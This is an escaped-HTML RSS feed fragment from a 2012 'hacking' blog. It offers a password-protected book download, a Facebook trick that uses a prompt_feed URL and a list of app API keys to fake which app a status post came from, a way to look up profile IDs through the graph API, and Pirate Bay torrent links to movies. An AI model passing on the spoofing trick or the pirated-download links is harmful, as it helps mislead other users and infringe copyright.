&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;This one-of-a-kind resource contains 500 pages of jaw-dropping hacks, mods, and customizations. These include creating mashups &lt;span class="IL_AD" id="IL_AD2"&gt;with data from&lt;/span&gt; other sources such as Flickr, building a space &lt;span class="IL_AD" id="IL_AD4"&gt;station&lt;/span&gt; tracker, hacking Maps with Firefox PiggyBank, and building a &lt;span class="IL_AD" id="IL_AD5"&gt;complete&lt;/span&gt; community site with Maps and Earth. Now you can map out locations, get &lt;span class="IL_AD" id="IL_AD1"&gt;driving directions&lt;/span&gt;, zoom into any point on the globe, &lt;span class="IL_AD" id="IL_AD6"&gt;display&lt;/span&gt; &lt;span class="IL_AD" id="IL_AD3"&gt;real time traffic&lt;/span&gt;, and much more.&lt;br /&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=2055989097824833615" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;NOTE :&lt;/span&gt;&lt;span style="color: #38761d;"&gt; Password For the links is&amp;nbsp;xSeLLizE&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://www.mediafire.com/?yydmzyymmuk" target="_blank"&gt;DOWNLOAD HERE&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sf1PtxwnwBBqk0o1FxSglz8Dz7hVrvJpruOVSF4Jy5HdFDfQpn7rNBF0nlNSRNq2RPGi4ODyKUrhIqKBRvyV2TpcJ8zMQ0EMWlXCF_W4uG5CMP0jhxcd-FaIp-sBHijKyf2n3iSnfWKP/s72-c/hacking+google+maps+and+google+earth.jpg" width="72"/></item><item><title>Facebook Status update New tricks</title><link>http://superhackings.blogspot.com/2012/10/facebook-status-update-new-tricks.html</link><category>Facebook Hack</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 8 Oct 2012 10:06:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-3185151467260131759</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg37q68r8ZtmnZrZy8k8_fFyzH-DDLWeMyID2ZOBEzGNMk32HIQVWMwMbX6I-61feFxQef4Sa6RMtiU2APacIRAFX0k5HZytf3Zymr8gdS25OvY4U_EdjEY1Bc-bsjXPnaGAzQpjlI4UIf/s200/afsf.jpg" width="200" /&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; This is an amazing &lt;span class="Apple-style-span" style="color: #cc0000;"&gt;facebook trick&lt;/span&gt;&amp;nbsp;which you would love to use. So the trick is to update your status with name of any app like Nasa, Iphone 5, HTC etc. Still confused just follow below instruction and clear your mind.&lt;br /&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=2055989097824833615" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;&amp;nbsp; 1.&lt;/b&gt; First&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt; Login&lt;/span&gt;&lt;/b&gt; to your Facebook account.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;2.&lt;span class="Apple-style-span" style="color: #cc0000;"&gt; Copy&lt;/span&gt;&lt;/b&gt; below &lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;link&lt;/span&gt;&lt;/b&gt; into &lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;address bar&lt;/span&gt;&lt;/b&gt; as shown in the below picture.&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;b&gt;http://www.facebook.com/connect/prompt_feed.php?preview=true&amp;amp;display=touch&amp;amp; &amp;nbsp; &amp;nbsp;api_key=&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;XXXXXXXXX&lt;/span&gt;&amp;amp;target_id=&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;YYYYYYYYYY&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYE9sEuXhiK4QQvf_O1hbCsB64Qjyg5K_CWHXY0LZibmucJP1lVWWnAE_pExu3n-tAJJSvsTNW2g4MJ7zQonKwnYICgwSROb4KuWQnXQyvq4N7ZLbbS56TXEsCYhmmHoiy3fH4Mvpsa-u5/s1600/Untitled-1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYE9sEuXhiK4QQvf_O1hbCsB64Qjyg5K_CWHXY0LZibmucJP1lVWWnAE_pExu3n-tAJJSvsTNW2g4MJ7zQonKwnYICgwSROb4KuWQnXQyvq4N7ZLbbS56TXEsCYhmmHoiy3fH4Mvpsa-u5/s1600/Untitled-1.gif" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&amp;nbsp;3.&lt;/b&gt; In place on &lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;XXXX&lt;/b&gt;&lt;/span&gt; put &lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;api key&lt;/span&gt;&lt;/b&gt; given in below list and in place of &lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;YYYY&lt;/span&gt;&lt;/b&gt; put&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt; profile id&lt;/span&gt;&lt;/b&gt; of&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;person where you want to publish your message. &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;b&gt;4.&lt;/b&gt; Now you will be redirected to &lt;span class="IL_AD" id="IL_AD10"&gt;new screen&lt;/span&gt; as above enter your message and done.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;u&gt;API KEY LIST&lt;/u&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Skynet (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;249284985083592&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;iPhone (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;6628568379&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Blackberry (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;2254487659&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Palm (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;7081486362&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Sidekick (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;21810043296&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Sony Ericsson (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;38125372145&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Xbox LIVE (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;5747726667&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;iPad (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;112930718741625&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Foursquare (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;86734274142&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD7"&gt;Telegram&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;140881489259157&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Carrier Pigeon (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;130263630347328&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Morse Code (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;134929696530963&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Message in a Bottle (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;123903037653697&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD12"&gt;Commodore&lt;/span&gt; 64 (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;138114659547999&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Your moms computer (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;132386310127809&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;TRS-80 (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;134998549862981&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;K.I.T.T. (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;129904140378622&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Mind Computer Interface (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;121111184600360&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;eyePhone (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;110455835670222&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;toaster (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;203192803063920&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;microwave (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;0a5266c8844a1b09211e7eb38242ac2f&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD4"&gt;Super Nintendo Entertainment System&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;235703126457431&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD8"&gt;Gameboy Color&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;180700501993189&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;GoD (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;256591344357588&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Glade Air Freshner (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;4aeb4db2e8df1cdb7f952b2269afb560&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Strawberry (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;a4c9fb1708a848c2241674531176209b&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;The moon (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;221826277855257&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Dr. Pepper (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;eea90d40e1d12565695dbbbdbd5e965b&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Nintendo wii (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;243870508973644&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Alcohol (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;250335888312118&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Cheese (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;218791271497130&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD11"&gt;iPod Nano&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;142039005875499&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD5"&gt;Nintendo 64&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;236264753062118&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD6"&gt;Microsoft&lt;/span&gt; Excel (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;242740155751069&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Linux Ubuntu (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;220593361311050&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD2"&gt;iPhone 5g&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;211333348912523&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;My Bedroom (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;174811032586879&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Your Mums Bedroom (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;5f64bbc9ac2f12b983200925da461322&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Lamp (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;230755826955133&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Your moms anus (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;b625297b655f0b46c86b68f754b82121&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Refrigerator (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;250828364944350&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;A potato (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;127926427295267&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD9"&gt;Nasa Satellite&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;31d608d30292175bf7703149699ccb39&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Vibrator (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;eb4c6d1a60e19a7795da501e1f468035&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Sperm Whale (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;170318539700306&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Pogo Stick (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;185103391549701&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Banana Phone (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;1477a4cd29ec724a3de19be5d26e0389&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Google+ (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;4d8243dbb7064f88351fe6c809582320&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;The Future (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;108372819220732&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD3"&gt;Smoke Signal&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;134138923334682&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;tin cans connected by string (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;242191299125647&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Pokedex (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;de3da265cf6976745bb1d60a8c198151&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Telepathy (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;ea01a57edb26cf1de143f09d45cfa913&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Typewriter (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;d3d554bf60297cb2c384e3d7cf5a066d&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Harry Potter (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;b8ebeb983f45eaa0bd5f4f66cad97654&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;TARDIS (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;200439256674396&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Pip Boy (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;142806259133078&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD1"&gt;Mind Control&lt;/span&gt; (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;1dc633368924b3b0b4d08e3f83230760&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Jedi Mind Control (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;240597869302110&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Telekinesis (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;224139600960217&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Post-It Note (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;115227201900831&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;GLaDOS (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;246126362083515&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Ansible (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;185474028180003&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;W.O.P.R (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;228373497202865&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;Airwolf (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;123944137696757&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;HMCS Belafonte (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;222345601140304&lt;/span&gt;)&lt;/li&gt;
&lt;li&gt;HAPPY BIRTHDAY (&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;60280877509&lt;/span&gt;)&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000; font-size: large;"&gt;&amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Any problem feel free to ask question and if you like my post just say thanx it will take less then 5 sec. Enter your email in below box and get free tutorials daily.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg37q68r8ZtmnZrZy8k8_fFyzH-DDLWeMyID2ZOBEzGNMk32HIQVWMwMbX6I-61feFxQef4Sa6RMtiU2APacIRAFX0k5HZytf3Zymr8gdS25OvY4U_EdjEY1Bc-bsjXPnaGAzQpjlI4UIf/s72-c/afsf.jpg" width="72"/></item><item><title>Trick to find facebook Profile ID</title><link>http://superhackings.blogspot.com/2012/10/trick-to-find-facebook-profile-id.html</link><category>Facebook Hack</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 8 Oct 2012 10:05:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-4479764839354113273</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge-RKDLTp9xUv-MSWPp5AylmoYueyY_qKxViUlPpBvwaiML-lk0vDi3XYl50Ppg9NfnXYQkI4A0pS_PiBgylICANHbLBCx6FnhkZS1ZAS4Nc67XskJ_Q8P3YhCy4vOJIktVLqmMbtqgCNe/s1600/dgsgsgs.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge-RKDLTp9xUv-MSWPp5AylmoYueyY_qKxViUlPpBvwaiML-lk0vDi3XYl50Ppg9NfnXYQkI4A0pS_PiBgylICANHbLBCx6FnhkZS1ZAS4Nc67XskJ_Q8P3YhCy4vOJIktVLqmMbtqgCNe/s200/dgsgsgs.gif" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;In my previous post i have posted about&amp;nbsp;&lt;b&gt;Facebook status update trick&lt;/b&gt;&amp;nbsp;in which we use profile id, but what if &amp;nbsp;&lt;span class="IL_AD" id="IL_AD8"&gt;person&lt;/span&gt; got username. So this is the trick which will let you get profile id of any person who got custom username. &lt;span class="IL_AD" id="IL_AD6"&gt;Check&lt;/span&gt; below image and see how URLof &amp;nbsp;facebook profile looks before and after custom username.&lt;br /&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=2055989097824833615" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioA6NSKgJT45GlS0qWUzjnOMG7lLrQ7OI2swYp-dk7DnDp0dmxS3mVLV7EwPyu1SjLOpNMErFH-2JjFWRXWuFwxZs3UXXryAe9G-HzXu6vNWX8DFZrKZfGNiE0WStzoW0zAo9fymFanz27/s1600/Untitled-4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioA6NSKgJT45GlS0qWUzjnOMG7lLrQ7OI2swYp-dk7DnDp0dmxS3mVLV7EwPyu1SjLOpNMErFH-2JjFWRXWuFwxZs3UXXryAe9G-HzXu6vNWX8DFZrKZfGNiE0WStzoW0zAo9fymFanz27/s640/Untitled-4.gif" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; In case of Profile ID before custom username you can easily &lt;span class="IL_AD" id="IL_AD3"&gt;identify&lt;/span&gt; it by looking at Profile URL, But in case of profile with custom username its not same. Below are &lt;span class="IL_AD" id="IL_AD2"&gt;simple steps&lt;/span&gt; to find Profile ID having custom username.&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Go to the profile you want to find Profile ID&lt;/li&gt;
&lt;li&gt;That URL will look like this &lt;b&gt;www.facebook.com/&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;username&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="IL_AD" id="IL_AD9"&gt;Change&lt;/span&gt; that URL to &lt;b&gt;graph.facebook.com/username&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Then you will get something like below image.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoNpzmuJA8S9yec0dshC9ucqi3Z6keBGnNmjJPscBU6VIvIoL2i0AbaMuGHuiHqnwSTtw8_pYKqsn8ahvOAFWIf0Ypm-5eQ85jJB2eO9GVr8JFfVwaboJUtH1dFrFac__m-sCW1yoBDuuW/s1600/fb4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoNpzmuJA8S9yec0dshC9ucqi3Z6keBGnNmjJPscBU6VIvIoL2i0AbaMuGHuiHqnwSTtw8_pYKqsn8ahvOAFWIf0Ypm-5eQ85jJB2eO9GVr8JFfVwaboJUtH1dFrFac__m-sCW1yoBDuuW/s400/fb4.gif" width="400" /&gt;&lt;/a&gt;&lt;b style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge-RKDLTp9xUv-MSWPp5AylmoYueyY_qKxViUlPpBvwaiML-lk0vDi3XYl50Ppg9NfnXYQkI4A0pS_PiBgylICANHbLBCx6FnhkZS1ZAS4Nc67XskJ_Q8P3YhCy4vOJIktVLqmMbtqgCNe/s72-c/dgsgsgs.gif" width="72"/></item><item><title>Top Hacker's Movies Download</title><link>http://superhackings.blogspot.com/2012/10/top-hackers-movies-download.html</link><category>Movies</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Mon, 8 Oct 2012 10:02:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-4217523411802607839</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: left;"&gt;
&lt;div class="center"&gt;
&lt;a href="http://thepiratebay.org/torrent/5506417" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img align="left" height="200" hspace="20" src="https://lh4.googleusercontent.com/-J7_LX4nUNWQ/TrNPAhg6qhI/AAAAAAAAAC8/Knhb0-aLnZI/s200/italian-job.jpg" width="132" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/3945886" target="_blank"&gt;&lt;img height="200" src="https://lh6.googleusercontent.com/-RL0DTIYu05Y/TrNO_4f7tcI/AAAAAAAAACw/6rUOlyjYYoM/s200/diehard.jpg" width="132" /&gt;&lt;/a&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/6700014" target="_blank"&gt;&lt;img height="200" src="https://lh3.googleusercontent.com/-H0epIzQsSQw/TrNPDiyh3PI/AAAAAAAAADg/eZd-tqwKTng/s200/swordfish.jpg" width="132" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;a href="http://thepiratebay.org/torrent/6212554" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img align="left" height="200" hspace="20" src="https://lh4.googleusercontent.com/-sc-bvgvyZr0/TrNPDiAqToI/AAAAAAAAADk/Gnpct6Sx3E4/s200/tron.jpg" width="132" /&gt;&lt;/a&gt; &amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/4524407" target="_blank"&gt;&lt;img height="200" src="https://lh3.googleusercontent.com/-oA9n0HRKRB0/TrNO_4WUPYI/AAAAAAAAAC4/tMb6-5cUn9c/s200/hackers.jpg" width="132" /&gt;&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/4206561" target="_blank"&gt;&lt;img height="200" src="https://lh5.googleusercontent.com/-RZRNcXH4pck/TrNPFUPEZfI/AAAAAAAAADw/YQ2FnYvyiUI/s200/wargames.jpg" width="132" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=2055989097824833615" name="more"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;a href="http://thepiratebay.org/torrent/4082603" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img align="left" height="200" hspace="20" src="https://lh6.googleusercontent.com/-YIN4FfzMaz4/TrNPA2-XivI/AAAAAAAAADA/QRArZOlQ24Y/s200/pirates.jpg" width="132" /&gt;&lt;/a&gt; &amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/5106105" target="_blank"&gt;&lt;img height="200" src="https://lh6.googleusercontent.com/-bDQQFjugw8s/TrNO_xGblmI/AAAAAAAAAC0/DwKO3-nIlfQ/s200/antitrust.jpg" width="132" /&gt;&lt;/a&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href="http://thepiratebay.org/torrent/4485901" target="_blank"&gt;&lt;img height="200" src="https://lh3.googleusercontent.com/-9iNRMJlyYPI/TrNPA3mwQeI/AAAAAAAAADI/2uA8YsIDH8g/s200/sneakers.jpg" width="132" /&gt;&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
